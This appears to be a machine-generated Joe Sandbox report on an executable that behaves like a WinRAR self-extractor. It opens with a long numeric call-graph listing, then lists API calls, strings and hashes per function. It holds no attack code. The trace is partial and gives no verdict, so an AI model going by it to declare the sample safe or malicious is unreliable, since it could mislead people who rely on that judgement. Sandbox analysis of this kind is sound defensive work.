25013 49085 25015 49620 77 API calls 25013->25015 25015->25017 25016 490fb 25239 46dcb 76 API calls 25016->25239 25017->24959 25017->25007 25021 416a4 25019->25021 25255 4cee1 25021->25255 25024 49f59 25023->25024 25025 49f63 
25024->25025 25267 46d0c 78 API calls 25024->25267 25025->24858 25027->24864 25028->24868 25034 41732 25029->25034 25031 413d6 25031->24908 25032->24907 25033->24903 25035 41748 25034->25035 25046 417a0 __InternalCxxFrameHandler 25034->25046 25036 41771 25035->25036 25047 46c36 76 API calls __vswprintf_c_l 25035->25047 25037 417c7 25036->25037 25041 4178d ___std_exception_copy 25036->25041 25040 63e3e 22 API calls 25037->25040 25039 41767 25048 46ca7 75 API calls 25039->25048 25043 417ce 25040->25043 25041->25046 25049 46ca7 75 API calls 25041->25049 25043->25046 25050 46ca7 75 API calls 25043->25050 25046->25031 25047->25039 25048->25036 25049->25046 25050->25046 25052 4cf4d 25051->25052 25054 4cf54 25051->25054 25056 4981a 25052->25056 25054->24912 25055->24914 25057 49833 25056->25057 25059 49e80 79 API calls 25057->25059 25058 49865 25058->25054 25059->25058 25061 419bf 25060->25061 25063 419bb 25060->25063 25064 418f6 25061->25064 25063->24918 25065 41908 25064->25065 25066 41945 25064->25066 25067 43b2d 101 API calls 25065->25067 25072 43fa3 25066->25072 25070 41928 25067->25070 25070->25063 25076 43fac 25072->25076 25073 43b2d 101 API calls 25073->25076 25074 41966 25074->25070 25077 41e50 25074->25077 25076->25073 25076->25074 25089 50e08 25076->25089 25078 41e5a __EH_prolog 25077->25078 25097 43bba 25078->25097 25080 41e84 25081 41732 78 API calls 25080->25081 25084 41f0b 25080->25084 25082 41e9b 25081->25082 25125 418a9 78 API calls 25082->25125 25084->25070 25085 41eb3 25087 41ebf _wcslen 25085->25087 25126 51b84 MultiByteToWideChar 25085->25126 25127 418a9 78 API calls 25087->25127 25090 50e0f 25089->25090 25091 50e2a 25090->25091 25095 46c31 RaiseException CallUnexpected 25090->25095 25093 50e3b SetThreadExecutionState 25091->25093 25096 46c31 RaiseException CallUnexpected 25091->25096 25093->25076 25095->25091 25096->25093 25098 43bc4 __EH_prolog 25097->25098 25099 43bf6 25098->25099 25100 43bda 25098->25100 25102 43e51 25099->25102 25105 43c22 
25099->25105 25153 4138b 74 API calls 25100->25153 25170 4138b 74 API calls 25102->25170 25104 43be5 25104->25080 25105->25104 25128 53377 25105->25128 25107 43ca3 25109 43d2e 25107->25109 25118 43c9a 25107->25118 25156 4d051 25107->25156 25108 43c9f 25108->25107 25155 420bd 78 API calls 25108->25155 25138 4ab1a 25109->25138 25111 43c71 25111->25107 25111->25108 25112 43c8f 25111->25112 25154 4138b 74 API calls 25112->25154 25114 43d41 25119 43dd7 25114->25119 25120 43dc7 25114->25120 25164 52297 25118->25164 25162 53020 123 API calls 25119->25162 25142 49215 25120->25142 25123 43dd5 25123->25118 25163 42021 74 API calls 25123->25163 25125->25085 25126->25087 25127->25084 25129 5338c 25128->25129 25131 53396 ___std_exception_copy 25128->25131 25171 46ca7 75 API calls 25129->25171 25132 534c6 25131->25132 25135 5341c 25131->25135 25137 53440 __cftof 25131->25137 25173 6238d RaiseException 25132->25173 25172 532aa 75 API calls 3 library calls 25135->25172 25136 534f2 25137->25111 25139 4ab28 25138->25139 25141 4ab32 25138->25141 25140 5eb38 8 API calls 25139->25140 25140->25141 25141->25114 25143 4921f __EH_prolog 25142->25143 25174 47c64 25143->25174 25146 413ba 78 API calls 25147 49231 25146->25147 25177 4d114 25147->25177 25150 4d114 118 API calls 25151 49243 25150->25151 25151->25150 25152 4928a 25151->25152 25186 4d300 97 API calls __InternalCxxFrameHandler 25151->25186 25152->25123 25153->25104 25154->25118 25155->25107 25157 4d084 25156->25157 25158 4d072 25156->25158 25188 4603a 82 API calls 25157->25188 25187 4603a 82 API calls 25158->25187 25161 4d07c 25161->25109 25162->25123 25163->25118 25165 522a1 25164->25165 25166 522ba 25165->25166 25169 522ce 25165->25169 25189 50eed 86 API calls 25166->25189 25168 522c1 25168->25169 25170->25104 25171->25131 25172->25137 25173->25136 25175 4b146 GetVersionExW 25174->25175 25176 47c69 25175->25176 25176->25146 25183 4d12a __InternalCxxFrameHandler 25177->25183 25178 4d29a 25179 4d2ce 25178->25179 25180 4d0cb 6 API 
calls 25178->25180 25181 50e08 SetThreadExecutionState RaiseException 25179->25181 25180->25179 25184 4d291 25181->25184 25182 58c8d 103 API calls 25182->25183 25183->25178 25183->25182 25183->25184 25185 4ac05 91 API calls 25183->25185 25184->25151 25185->25183 25186->25151 25187->25161 25188->25161 25189->25168 25190->24928 25191->24928 25192->24925 25194 45d2a 25193->25194 25240 45c4b 25194->25240 25197 45d5d 25198 45d95 25197->25198 25245 4b1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 25197->25245 25198->24943 25200 48186 25199->25200 25201 48232 25200->25201 25252 4be5e 19 API calls __InternalCxxFrameHandler 25200->25252 25251 51fac CharUpperW 25201->25251 25204 4823b 25204->24946 25206 47c22 25205->25206 25207 47c5a 25206->25207 25253 46e7a 74 API calls 25206->25253 25207->24956 25209 47c52 25254 4138b 74 API calls 25209->25254 25211->25008 25213 49db3 25212->25213 25215 49dc2 25212->25215 25214 49db9 FlushFileBuffers 25213->25214 25213->25215 25214->25215 25216 49e3f SetFileTime 25215->25216 25216->25013 25217->24935 25218->24942 25219->24942 25220->24956 25221->24956 25222->24952 25223->24965 25224->24961 25225->24965 25227 498c5 GetFileType 25226->25227 25228 48b5a 25226->25228 25227->25228 25228->24979 25229 42021 74 API calls 25228->25229 25229->24977 25230->24979 25231->24980 25232->25005 25233->25005 25234->25005 25235->25005 25236->25005 25237->25009 25238->25016 25239->24959 25246 45b48 25240->25246 25242 45c6c 25242->25197 25244 45b48 2 API calls 25244->25242 25245->25197 25247 45b52 25246->25247 25249 45c3a 25247->25249 25250 4b1dc CharUpperW CompareStringW ___vcrt_FlsSetValue _wcslen 25247->25250 25249->25242 25249->25244 25250->25247 25251->25204 25252->25201 25253->25209 25254->25207 25256 4cef2 25255->25256 25261 4a99e 25256->25261 25258 4cf24 25259 4a99e 86 API calls 25258->25259 25260 4cf2f 25259->25260 25262 4a9c1 25261->25262 25265 4a9d5 25261->25265 25266 50eed 86 API calls 25262->25266 25264 4a9c8 25264->25265 25265->25258 
25266->25264 25267->25025 25269 4a6a8 25268->25269 25270 4a727 FindNextFileW 25269->25270 25271 4a6c1 FindFirstFileW 25269->25271 25272 4a732 GetLastError 25270->25272 25278 4a709 25270->25278 25273 4a6d0 25271->25273 25271->25278 25272->25278 25274 4bb03 GetCurrentDirectoryW 25273->25274 25275 4a6e0 25274->25275 25276 4a6e4 FindFirstFileW 25275->25276 25277 4a6fe GetLastError 25275->25277 25276->25277 25276->25278 25277->25278 25278->24880 25279->24714 25280->24721 25281->24721 25282->24723 25283->24731 25285 49f42 78 API calls 25284->25285 25286 41fe8 25285->25286 25287 42005 25286->25287 25288 41a04 101 API calls 25286->25288 25287->24739 25287->24740 25289 41ff5 25288->25289 25289->25287 25291 4138b 74 API calls 25289->25291 25291->25287 25292 413e1 84 API calls 2 library calls 25378 594e0 GetClientRect 25403 521e0 26 API calls std::bad_exception::bad_exception 25420 5f2e0 46 API calls __RTC_Initialize 25421 6bee0 GetCommandLineA GetCommandLineW 25404 4f1e8 FreeLibrary 25405 495f0 80 API calls 25406 5fd4f 9 API calls 2 library calls 25422 45ef0 82 API calls 25307 698f0 25315 6adaf 25307->25315 25311 6990c 25312 69919 25311->25312 25323 69920 11 API calls 25311->25323 25314 69904 25316 6ac98 __dosmaperr 5 API calls 25315->25316 25317 6add6 25316->25317 25318 6adee TlsAlloc 25317->25318 25321 6addf 25317->25321 25318->25321 25319 5fbbc CatchGuardHandler 5 API calls 25320 698fa 25319->25320 25320->25314 25322 69869 20 API calls 2 library calls 25320->25322 25321->25319 25322->25311 25323->25314 25325 6abf0 25328 6abfb 25325->25328 25326 6af0a 11 API calls 25326->25328 25327 6ac24 25331 6ac50 DeleteCriticalSection 25327->25331 25328->25326 25328->25327 25329 6ac20 25328->25329 25331->25329 25380 688f0 7 API calls ___scrt_uninitialize_crt 25381 62cfb 38 API calls 4 library calls

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00050863: GetModuleHandleW.KERNEL32(kernel32), ref: 0005087C
                                                                                                                      • Part of subcall function 00050863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0005088E
                                                                                                                      • Part of subcall function 00050863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 000508BF
                                                                                                                      • Part of subcall function 0005A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0005A655
                                                                                                                      • Part of subcall function 0005AC16: OleInitialize.OLE32(00000000), ref: 0005AC2F
                                                                                                                      • Part of subcall function 0005AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0005AC66
                                                                                                                      • Part of subcall function 0005AC16: SHGetMalloc.SHELL32(00088438), ref: 0005AC70
                                                                                                                    • GetCommandLineW.KERNEL32 ref: 0005DF5C
                                                                                                                    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0005DF83
                                                                                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0005DF94
                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0005DFCE
                                                                                                                      • Part of subcall function 0005DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0005DBF4
                                                                                                                      • Part of subcall function 0005DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0005DC30
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0005DFD7
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,0009EC90,00000800), ref: 0005DFF2
                                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxname,0009EC90), ref: 0005DFFE
                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 0005E009
                                                                                                                    • _swprintf.LIBCMT ref: 0005E048
                                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0005E05A
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0005E061
                                                                                                                    • LoadIconW.USER32(00000000,00000064), ref: 0005E078
                                                                                                                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0005E0C9
                                                                                                                    • Sleep.KERNEL32(?), ref: 0005E0F7
                                                                                                                    • DeleteObject.GDI32 ref: 0005E130
                                                                                                                    • DeleteObject.GDI32(?), ref: 0005E140
                                                                                                                    • CloseHandle.KERNEL32 ref: 0005E183
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xz
                                                                                                                    • API String ID: 3049964643-764618974
                                                                                                                    • Opcode ID: 886c4933cd46d4443e6092e9ccda80ec94c214e4b500d2b7070aa938ad982f7e
                                                                                                                    • Instruction ID: 6d9d344fe96d97fc545fd44c2a8617ad25c4c350e5cb1f14ea0fe1aaecc3c5aa
                                                                                                                    • Opcode Fuzzy Hash: 886c4933cd46d4443e6092e9ccda80ec94c214e4b500d2b7070aa938ad982f7e
                                                                                                                    • Instruction Fuzzy Hash: 2E61C671904245AFF320AB74DC49FAB37ECFB45702F00442AFD8996192DBBC9948D766

                                                                                                                    Control-flow Graph: function block 5a6c2-5a7e1 (graph rendering not preserved; the calls it makes are listed under APIs below)
                                                                                                                    APIs
                                                                                                                    • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0005B73D,00000066), ref: 0005A6D5
                                                                                                                    • SizeofResource.KERNEL32(00000000,?,?,?,0005B73D,00000066), ref: 0005A6EC
                                                                                                                    • LoadResource.KERNEL32(00000000,?,?,?,0005B73D,00000066), ref: 0005A703
                                                                                                                    • LockResource.KERNEL32(00000000,?,?,?,0005B73D,00000066), ref: 0005A712
                                                                                                                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0005B73D,00000066), ref: 0005A72D
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0005A73E
                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0005A762
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0005A7C6
                                                                                                                      • Part of subcall function 0005A626: GdipAlloc.GDIPLUS(00000010), ref: 0005A62C
                                                                                                                    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0005A7A7
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 0005A7CD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                                                    • String ID: PNG
                                                                                                                    • API String ID: 211097158-364855578
                                                                                                                    • Opcode ID: 1f8b751b52340bdf3349f93d9a0695c4ce967781114969dc6f354157e0828de5
                                                                                                                    • Instruction ID: c8c820e41a44d79fcc5845d3ac5d6051c5e08ea32be558aa3e1640b9ded8296f
                                                                                                                    • Opcode Fuzzy Hash: 1f8b751b52340bdf3349f93d9a0695c4ce967781114969dc6f354157e0828de5
                                                                                                                    • Instruction Fuzzy Hash: 6E319275A04306AFE7109F21DC48D1B7BB9FF89761B000618FD0992621EB39DD49DA61

                                                                                                                    Control-flow Graph: function block 4a69b-4a811 (graph rendering not preserved; the calls it makes are listed under APIs below)
                                                                                                                    APIs
                                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0004A592,000000FF,?,?), ref: 0004A6C4
                                                                                                                      • Part of subcall function 0004BB03: _wcslen.LIBCMT ref: 0004BB27
                                                                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0004A592,000000FF,?,?), ref: 0004A6F2
                                                                                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0004A592,000000FF,?,?), ref: 0004A6FE
                                                                                                                    • FindNextFileW.KERNEL32(?,?,?,?,?,?,0004A592,000000FF,?,?), ref: 0004A728
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,0004A592,000000FF,?,?), ref: 0004A734
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 42610566-0
                                                                                                                    • Opcode ID: 4132412d45861f4f8dedcc7974a093729970d99849e941911a1aac028ad62bb7
                                                                                                                    • Instruction ID: 71c30ff66442eeceeaa668f8dc7fde960c7a37ff222f54dcda2c10d5a9c50513
                                                                                                                    • Opcode Fuzzy Hash: 4132412d45861f4f8dedcc7974a093729970d99849e941911a1aac028ad62bb7
                                                                                                                    • Instruction Fuzzy Hash: 01419FB2A00515ABCB25DF64CC88AEEB7B8FB49350F1441A6F95DE3201D734AE94CF94
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,00067DC4,00000000,0007C300,0000000C,00067F1B,00000000,00000002,00000000), ref: 00067E0F
                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00067DC4,00000000,0007C300,0000000C,00067F1B,00000000,00000002,00000000), ref: 00067E16
                                                                                                                    • ExitProcess.KERNEL32 ref: 00067E28
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1703294689-0
                                                                                                                    • Opcode ID: 8f628433d8b991cce88a9034cec8f98356e295d65f900228956da7e08cd3cca4
                                                                                                                    • Instruction ID: 3284f73f7f9d8bc79a1049435defea18024d81e206cb904d9cb8a72f49b12693
                                                                                                                    • Opcode Fuzzy Hash: 8f628433d8b991cce88a9034cec8f98356e295d65f900228956da7e08cd3cca4
                                                                                                                    • Instruction Fuzzy Hash: B1E04631400148ABEF016F20CD09A8A3FAAEB04345B404464F80D9A132CB3AEE96DA80
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3519838083-0
                                                                                                                    • Opcode ID: 744d02fbee0f23af05919352a7e3f9dfaeda919a54bc8b22bac60255a28e43d0
                                                                                                                    • Instruction ID: f38fe781fc75f232e2ff383e9e94e506f84cf6294f0f9129367bb0bd0d0f20d3
                                                                                                                    • Opcode Fuzzy Hash: 744d02fbee0f23af05919352a7e3f9dfaeda919a54bc8b22bac60255a28e43d0
                                                                                                                    • Instruction Fuzzy Hash: 3B821AF0904145AEDF65DF64C895BFEBBF9AF05300F0885B9E8499B143DB315A88CB68
                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 0005B7E5
                                                                                                                      • Part of subcall function 00041316: GetDlgItem.USER32(00000000,00003021), ref: 0004135A
                                                                                                                      • Part of subcall function 00041316: SetWindowTextW.USER32(00000000,000735F4), ref: 00041370
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0005B8D1
                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0005B8EF
                                                                                                                    • IsDialogMessageW.USER32(?,?), ref: 0005B902
                                                                                                                    • TranslateMessage.USER32(?), ref: 0005B910
                                                                                                                    • DispatchMessageW.USER32(?), ref: 0005B91A
                                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0005B93D
                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0005B960
                                                                                                                    • GetDlgItem.USER32(?,00000068), ref: 0005B983
                                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0005B99E
                                                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,000735F4), ref: 0005B9B1
                                                                                                                      • Part of subcall function 0005D453: _wcslen.LIBCMT ref: 0005D47D
                                                                                                                    • SetFocus.USER32(00000000), ref: 0005B9B8
                                                                                                                    • _swprintf.LIBCMT ref: 0005BA24
                                                                                                                      • Part of subcall function 00044092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000440A5
                                                                                                                      • Part of subcall function 0005D4D4: GetDlgItem.USER32(00000068,0009FCB8), ref: 0005D4E8
                                                                                                                      • Part of subcall function 0005D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0005AF07,00000001,?,?,0005B7B9,0007506C,0009FCB8,0009FCB8,00001000,00000000,00000000), ref: 0005D510
                                                                                                                      • Part of subcall function 0005D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0005D51B
                                                                                                                      • Part of subcall function 0005D4D4: SendMessageW.USER32(00000000,000000C2,00000000,000735F4), ref: 0005D529
                                                                                                                      • Part of subcall function 0005D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0005D53F
                                                                                                                      • Part of subcall function 0005D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0005D559
                                                                                                                      • Part of subcall function 0005D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0005D59D
                                                                                                                      • Part of subcall function 0005D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0005D5AB
                                                                                                                      • Part of subcall function 0005D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0005D5BA
                                                                                                                      • Part of subcall function 0005D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0005D5E1
                                                                                                                      • Part of subcall function 0005D4D4: SendMessageW.USER32(00000000,000000C2,00000000,000743F4), ref: 0005D5F0
                                                                                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0005BA68
                                                                                                                    • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0005BA90
                                                                                                                    • GetTickCount.KERNEL32 ref: 0005BAAE
                                                                                                                    • _swprintf.LIBCMT ref: 0005BAC2
                                                                                                                    • GetLastError.KERNEL32(?,00000011), ref: 0005BAF4
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0005BB43
                                                                                                                    • _swprintf.LIBCMT ref: 0005BB7C
                                                                                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0005BBD0
                                                                                                                    • GetCommandLineW.KERNEL32 ref: 0005BBEA
                                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0005BC47
                                                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 0005BC6F
                                                                                                                    • Sleep.KERNEL32(00000064), ref: 0005BCB9
                                                                                                                    • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0005BCE2
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0005BCEB
                                                                                                                    • _swprintf.LIBCMT ref: 0005BD1E
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0005BD7D
                                                                                                                    • SetDlgItemTextW.USER32(?,00000065,000735F4), ref: 0005BD94
                                                                                                                    • GetDlgItem.USER32(?,00000065), ref: 0005BD9D
                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0005BDAC
                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0005BDBB
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0005BE68
                                                                                                                    • _wcslen.LIBCMT ref: 0005BEBE
                                                                                                                    • _swprintf.LIBCMT ref: 0005BEE8
                                                                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 0005BF32
                                                                                                                    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0005BF4C
                                                                                                                    • GetDlgItem.USER32(?,00000068), ref: 0005BF55
                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0005BF6B
                                                                                                                    • GetDlgItem.USER32(?,00000066), ref: 0005BF85
                                                                                                                    • SetWindowTextW.USER32(00000000,0008A472), ref: 0005BFA7
                                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0005C007
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0005C01A
                                                                                                                    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0005C0BD
                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 0005C197
                                                                                                                    • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0005C1D9
                                                                                                                      • Part of subcall function 0005C73F: __EH_prolog.LIBCMT ref: 0005C744
                                                                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0005C1FD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                                                                                    • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                                                    • API String ID: 3445078344-2238251102
                                                                                                                    • Opcode ID: 076a42294808c5ae2a5571b78ba8bb619074223133766753f217d60cb11fdaa2
                                                                                                                    • Instruction ID: 9246e0e18081ea8b88bb8b62c65a56ede50674be760ee4115f0ee75ca3fa65cf
                                                                                                                    • Opcode Fuzzy Hash: 076a42294808c5ae2a5571b78ba8bb619074223133766753f217d60cb11fdaa2
                                                                                                                    • Instruction Fuzzy Hash: F842C7B1944649BEFB219B70DD4AFFF77ACAB02701F044055FA45A60D3CBB86A48CB25

                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32), ref: 0005087C
                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0005088E
                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 000508BF
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00050B69
                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00050B83
                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00050B93
                                                                                                                    • ReadFile.KERNEL32(00000000,?,00007FFE,00073C7C,00000000), ref: 00050BB1
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00050C09
                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00050C1E
                                                                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00073C7C,?,00000000,?,00000800), ref: 00050C72
                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00073C7C,00000800,?,00000000,?,00000800), ref: 00050C9C
                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,00073D44,00000800), ref: 00050CD8
                                                                                                                      • Part of subcall function 0005081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00050836
                                                                                                                      • Part of subcall function 0005081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0004F2D8,Crypt32.dll,00000000,0004F35C,?,?,0004F33E,?,?,?), ref: 00050858
                                                                                                                    • _swprintf.LIBCMT ref: 00050D4A
                                                                                                                    • _swprintf.LIBCMT ref: 00050D96
                                                                                                                      • Part of subcall function 00044092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000440A5
                                                                                                                    • AllocConsole.KERNEL32 ref: 00050D9E
                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00050DA8
                                                                                                                    • AttachConsole.KERNEL32(00000000), ref: 00050DAF
                                                                                                                    • _wcslen.LIBCMT ref: 00050DC4
                                                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00050DD5
                                                                                                                    • WriteConsoleW.KERNEL32(00000000), ref: 00050DDC
                                                                                                                    • Sleep.KERNEL32(00002710), ref: 00050DE7
                                                                                                                    • FreeConsole.KERNEL32 ref: 00050DED
                                                                                                                    • ExitProcess.KERNEL32 ref: 00050DF5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1693340598.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_40000_PbfYaIvR5B.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                                                    • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                                                    • API String ID: 1207345701-3298887752
                                                                                                                    • Opcode ID: ee74317def21808de3c41358516260c079dea16b748d6be66208fb55918f61af
                                                                                                                    • Instruction ID: e021802cee21d90e57cfe2a28a445723208cbce2336a0cb14d30c0d66f54c40c
                                                                                                                    • Opcode Fuzzy Hash: ee74317def21808de3c41358516260c079dea16b748d6be66208fb55918f61af
                                                                                                                    • Instruction Fuzzy Hash: C2D185B1804384ABE3319F50C849BDFBAE8BB85305F50891DF68D96151CB7C964CDBAB

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 0005C744
